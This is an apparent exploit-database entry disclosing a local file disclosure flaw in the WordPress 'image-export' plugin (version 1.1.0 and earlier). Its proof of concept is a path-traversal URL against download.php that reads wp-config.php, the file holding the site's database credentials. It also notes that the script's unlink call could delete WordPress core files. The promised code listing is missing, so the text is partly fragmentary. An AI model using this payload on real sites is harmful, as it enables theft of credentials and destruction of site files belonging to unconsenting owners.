# Exploit Title: Wordpress image-export LFD # Date: 03/21/2016 # Exploit Author: AMAR^SHG # Vendor Homepage: http://www.1efthander.com # Software Link: http://www.1efthander.com/category/wordpress-plugins/image-export # Version: Everything is affected including latest (1.1.0 ) # Tested on: Windows/Unix on localhost download.php file code: Proof of concept: Note that because of the unlink, we potentially can destroy the wordpress core. Simply add the get parameter file: localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php Found by AMAR^SHG (Shkupi Hackers Group)